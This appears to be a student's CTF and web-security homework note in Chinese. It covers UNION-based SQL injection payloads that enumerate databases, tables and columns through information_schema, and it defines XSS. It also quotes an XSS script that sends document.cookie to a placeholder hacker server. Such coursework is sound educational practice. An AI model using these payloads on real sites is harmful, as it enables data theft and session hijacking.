# 2019/11/12 - information_schema 是什麼 >屬於一種資訊資料庫,其中存著關於私服器維護的所有其他資料庫的資訊,如資料庫的表,表欄的資料型別與訪問權限等。 - 如果想知道 這台 mysql server 有啥資料庫,如何下sql指令 >' union select 'a','a', schema_name FROM information_schema.schemata ; - 如果想知道`ctf`資料庫底下有什麼表格,如何下sql指令 >' union select 'a','a', table_name FROM information_schema.columns WHERE table_schema = 'ctf'; - 如果想知道`stu` table 底下有什麼欄位,如何下sql指令 >' union select 'a','a', column_name FROM information_schema.columns WHERE table_name = 'stu'; - 解釋 SQL III 是如何 dump 出整個資料庫 >在information_schema裡面選取schema_name的欄位取得所有資料庫名稱。在資料庫名稱內尋找具有ctf名稱的table有哪些,最後在將ctf的table下的欄位列出來就能得到我們需要的flag。 - XSS 攻擊是什麼 >是泛指攻擊者在Web網頁上插入惡意html代碼(javascript),以達到特殊目的例如控制網站或取走cookies與使用者資料等。 - 截圖完成https://xss-game.appspot.com/前三關 >1.![](https://i.imgur.com/qkHm2IL.png) >2.![](https://i.imgur.com/ZAiwKwl.png) >3.![](https://i.imgur.com/Bi7zYkH.png) - 解釋為何`<script>document.location.href="https://{駭客伺服器}/"+document.cookie</script>` 可以拿到使用者權限 - 截圖 CTF 完成 SQL I, II, XSS >![](https://i.imgur.com/BCe9sRJ.png)
{"metaMigratedAt":"2023-06-15T01:45:52.436Z","metaMigratedFrom":"Content","title":"2019/11/12","breaks":true,"contributors":"[{\"id\":\"e5c1ded9-91fc-4d07-8152-26c6f08a77d2\",\"add\":998,\"del\":4}]"}
Expand menu